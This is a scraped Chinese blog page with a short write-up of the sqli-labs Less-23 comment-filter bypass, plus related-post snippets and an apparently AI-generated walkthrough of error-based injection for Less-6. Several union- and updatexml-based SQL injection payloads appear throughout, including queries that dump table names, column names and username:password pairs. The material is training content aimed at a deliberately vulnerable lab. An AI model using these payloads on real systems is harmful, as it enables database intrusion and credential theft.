sqli-labs第二十三关(注释过滤绕过)

最新推荐文章于 2024-07-03 16:30:14 发布
最新推荐文章于 2024-07-03 16:30:14 发布
阅读量635 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: sqliabs 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42266432/article/details/120051567
本文介绍了如何利用SQL注入技巧,避开源码中的注释过滤机制,成功获取数据库名,并进一步演示了爆库和字段信息获取的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
从源码可知此关将注释符全部过滤掉,需要绕过,使用and ‘1’='1即可
在这里插入图片描述

http://localhost:90/sqli-labs-master/Less-23/?id=-1'  union select 111,(select group_concat(schema_name)from information_schema.schemata),3 or '1'='1

这关没什么可说的直接爆库名,接下来爆表,字段啥的就不再演示,此关结束

sqli-labs卡23(基于get提交的过滤注释的报错注入)
zyh1588的博客
01-15 1286
小白回顾sql靶场23
Sqli-labs靶场通(1-20
2301_77977773的博客
07-03 1116
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
sql注释注入防御_【实验】绕过注释过滤
weixin_39637723的博客
12-21 317
渗透测试工程师(CISP-PTE)超值专题(含本课程)SQL注入经过21年的发展,至今为止依然是OWASP 排名最严重的漏洞,可以看出SQL漏洞危害的严重性和持久性,本节课程从以下几个方面来讲解SQL注入。【理论】SQL注入的业务场景以及危害(1、SQL注入起源 2、为什么会有SQL注入 3、SQL注入的业务场景以及危害 4、不同人群对SQL注入的看法)【实验】真实网站中的SQL注入是怎么样的(通...
sqli-labs第二十三
m0_73248913的博客
02-19 340
sqli-labs第十二十三
Sqli-labs Less25-28 绕过过滤函数对字过滤 - GET
kevinhanser
08-10 591
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 25: GET - Error based - All your OR & AND belong to us - String Single Quote 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; function...
sqli-labs靶场第二十三
gou1791241251的博客
01-04 569
二十三传入参数id=1页面正常显示,然后测试闭合方式。当输入单引号时,页面报错,说明很可能是单引号闭合 加上注释号时还是同样报错!! 尝试了–+注释 和#注释还是一样报错 尝试一下加上)括号和)) 还是报错,此时很可能就是注释号被过滤掉了,没有起到作用 使用单引号闭合已经成功了!! 可以使用联合查询,报错注入等方式可以来获取数据库信息 在这里做一个简单的记录,判断字段数的时候,使用order by 15还是能查询成功,具体问题出现在哪我也不清楚,所以用了另一种可以判断字段数的方法:就是unio
sqli-labs(二十三)
qq_65950075的博客
05-08 602
这一是get类型当输入?id=1'时,出现报错信息,是由单引号闭合的但是输入?id=1'--+的时候,还是报错,说明我们的注释可能被过滤处理了查看码源,确实是把注释过滤了那我们还是根据语句构造?成功了判断字段数,这里不能用order by,只能不断往上加数字,不过一般都是3?说明是三个字段,只显示2号位,那我们就可以在这个位置进行注入?
sqli-labs卡25(基于get提交的过滤and和or的联合注入)
zyh1588的博客
01-16 1504
小白回顾sqli-labs靶场25
Sqli-labs-master靶场之1-21秘籍
m0_66241651的博客
07-03 940
此靶场就是让我们掌握sql注入的基本方法,通秘籍来了,轻轻松松搞定!
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9177
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
19、绕过去除注释(Get)
Web安全工具库
12-10 505
环境sqli-labs less 23 1、输入?id=1,正常运行 2、输入特殊字报错 3、单引号闭合,但是发现# --+等都被过滤了 4、使用下面代码闭合 192.168.1.121/sqli/less-23?id=1’ or ‘1’=‘1 5、用union select判断字段数 192.168.1.121/sqli/less-23?id=1’ union select 1,2,...
sqli-labs靶场Less-23 注释绕过
songling515010475的专栏
08-27 327
这里过滤掉了 # 和 -- ,所以这里第一条件就是要让union前面的条件失效,第二就是通过结尾的 and '1'='1 进行绕过 ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1 ...
sqli-labs()过滤注释
weixin_30847939的博客
08-29 169
第二十三: 这还是一个GET型、字串、单引号、的有报错的sql注入,输入?id=1' ,页面会报错 我们继续按照之前的套路来,先输入?id=1' or '1'='1 页面正常显示,说明这个地方又很有可能存在sql注入。继续输入?id=1' or '1'='1' %23 发现页面居然报错,从报错信息中发现我们的注释居然没了,说明后台对注释中做了过滤。 像这种情况...
sqli-labs—————Sql注入之盲注讲解
Fly_鹏程万里
05-08 2307
盲注何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注1、基于布尔SQL盲注————构造逻辑判断我们可以利用逻辑判断进行截取字串相函数解析  http://blog.youkuaiyun.com/Fly_hps/article...
Sqli-Lab靶场中SQL注入实际操作使用的注释与数据库中使用的注释的不同
大大大蜜蜂的博客
10-05 1626
注释原理解释 执行的sql语句: select name from usertest where id=1 – 注释测试 执行的sql语句: select name from usertest where id=1 #注释测试 执行的sql语句: select name from usertest where id=1 /注释测试/ URL:http://www.sqllab.com/Less-1/?id=-1’ union select 1,database(),3 # UR
sqli-labs笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3671
sqli-labs靶场之前建议补一下基础。
SQL-labs的第23——注释被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 306
这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。但是如果是3个null,那么不会报错,这说明总共有3个注入位置。我们有添加了),但是仍然报错,这时我们怀疑注释被屏蔽了。接下来,我们看一下,那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是',并且注释被屏蔽了。我们发现这里好像有回显,我们输入语句。使用报错注入也可以。
sqli-labs学习sql注入
qq_46041723的博客
02-29 360
sqli-labs的安装和配置 下载sqli-labs和phpstudy(注意PHP study版本不能高于8.0,不然容易出错,本人就是PHP study版本高了,一直出错) 下载完成后将sqli-labs解压放在PHP study的WWW文件夹下 打开sqli-labs-master\sql-connections,在里面有一个db-creds.inc文档,打开编辑 一般默认用户名、密码都...
sqli-labs/Less-23
m0_71299382的博客
11-19 197
sqli-labs第二十三
sqli-labs-masterd第六报错注入查数据
最新发布
03-30
<think>好的,我现在需要解决SQLi-Labs第六的报错注入问题。首先,我应该回忆一下第六的基本情况。根据用户提供的引用内容,第六是基于GET提交的双引号闭合的报错注入。之前第五是单引号闭合,而第六可能换成了双引号,所以闭合方式不同。 接下来,我需要确定注入点。用户提到的第六需要判断注入点是否正确。通常,我会先尝试在参数后添加一个双引号,看是否引发数据库报错。比如,访问?id=1",如果页面返回语法错误,说明可能存在双引号闭合的漏洞。根据引用[5],第六确实是双引号闭合,所以这一步应该是正确的。 然后,我需要确认报错注入的方式。常见的报错函数有updatexml()、extractvalue()等。比如在第五使用了updatexml,如引用[4]中的示例:?id=1' and updatexml(...)。但第六是双引号闭合,所以闭合方式应该是"而不是'。因此,构造payload时需要用双引号闭合,并注释掉后面的部分。例如:?id=1" and updatexml(...) --+。这里要注意注释的使用,可能用%23(#的URL编码)或者--+来注释。 接下来是获取数据。假设已经确认注入点,接下来需要构造查询来获取数据库信息。例如,获取当前用户,可以使用:?id=1" and updatexml(1, concat(0x7e, (select user()), 0x7e), 1)--+。这里的0x7e是波浪号~的十六进制,用于分割结果,使报错信息中显示查询内容。根据引用[4],类似的payload在第五有效,第六应该类似,只是闭合方式不同。 但需要处理数据截断的问题,因为updatexml报错只能返回32位长度,所以如果查询结果较长,可能需要用substring或limit分次获取。例如,获取数据库名:?id=1" and updatexml(1, concat(0x7e, (select database()), 0x7e), 1)--+。然后继续获取表名、字段名等。 另外,根据引用[3],第八没有报错信息,但第六可能有报错回显,所以可以依赖报错信息来提取数据。如果遇到无回显的情况,可能需要时间盲注或其他方法,但第六应该支持报错注入。 还需要注意用户提到的引用[5]中的通思路,包括判断注入点和payload构造。例如,在第六中,闭合是双引号,所以参数应该是"加上注入语句,然后注释掉剩余部分。比如:?id=1" and (payload)--+。 总结步骤:1. 确认注入点为双引号闭合;2. 使用报错函数如updatexml构造payload;3. 逐步获取数据库信息,处理截断;4. 最终获取目标数据如用户名、密码等。 可能存在的问题:是否双引号闭合需要验证,或者是否有其他过滤措施?比如,是否存在对某些键字的过滤,是否需要绕过。根据用户提供的引用,第六似乎没有提到过滤,所以可能直接使用报错注入即可。 另外,注意语法正确性,比如闭合双引号后是否需要平衡括号,或者是否存在转义字的问题。例如,在双引号闭合后,后面的语句需要用注释注释掉原SQL的剩余部分,避免语法错误。 测试payload时,需要确保拼接后的SQL语句正确。例如,原语句可能是SELECT ... FROM ... WHERE id="输入" LIMIT 0,1。当输入为1" and updatexml(...) --+时,整个语句变为WHERE id="1" and updatexml(...) --+" LIMIT 0,1,这样注释注释掉后面的双引号和LIMIT部分,避免语法错误。 如果报错信息显示语法错误,可能需要调整闭合方式或注释的使用。例如,使用%23代替--+,因为有时URL中的+会被解码为空格,而%23是#的编码,注释效果更可靠。 最后,根据步骤逐步获取所需数据,可能需要多次注入,每次获取部分信息,直到得到完整的数据库内容。</think>### SQLi-Labs 第六报错注入解决方案 #### 1. 确认注入点与闭合方式 第六为**双引号闭合**的报错注入。通过以下步骤验证: - 输入 `?id=1"`,若页面返回语法错误(如引用[2]所示),则确认闭合方式为双引号。 - 示例报错:`You have an error in your SQL syntax... near '"1"" LIMIT 0,1'`[^2]。 #### 2. 构造报错注入Payload 使用 `updatexml()` 函数触发报错并回显数据: ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT database()), 0x7e), 1)--+ ``` - **键点**: - `0x7e` 为 `~` 号的十六进制,用于分隔报错内容。 - `--+` 或 `%23` 用于注释后续SQL语句(如 `LIMIT 0,1`)[^4][^5]。 #### 3. 分步获取数据 ##### (1) 获取数据库名 ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT database()), 0x7e), 1)--+ ``` 报错回显示例:`XPATH syntax error: '~security~'`,表明当前数据库为 `security`[^1]。 ##### (2) 获取表名 ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)), 0x7e), 1)--+ ``` - 调整 `LIMIT` 参数遍历所有表(如 `emails`, `users` 等)。 ##### (3) 获取字段名(以 `users` 表为例) ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1), 0x7e), 1)--+ ``` - 遍历 `LIMIT` 获取字段名(如 `id`, `username`, `password`)。 ##### (4) 提取数据(以 `username` 和 `password` 为例) ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT concat(username, ':', password) FROM users LIMIT 0,1), 0x7e), 1)--+ ``` - 报错截断处理:若结果过长,使用 `substr()` 分段获取: ```sql ?id=1" and updatexml(1, concat(0x7e, substr((SELECT password FROM users LIMIT 0,1), 1, 20), 0x7e), 1)--+ ``` #### 4. 绕过长度限制的技巧 - 使用 `mid()` 或 `substr()` 分段读取字段值。 - 示例: ```sql ?id=1" and updatexml(1, concat(0x7e, mid((SELECT group_concat(username) FROM users), 1, 30), 0x7e), 1)--+ ``` #### 5. 注意事项 1. **闭合完整性**:确保双引号闭合后通过注释 `--+` 或 `%23` 截断原SQL语句。 2. **错误处理**:若报错信息不完整,调整 `concat()` 参数或使用 `offset` 跳过已获取的数据。 3. **编码问题**:特殊字需URL编码(如空格用 `%20`, `#` 用 `%23`)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值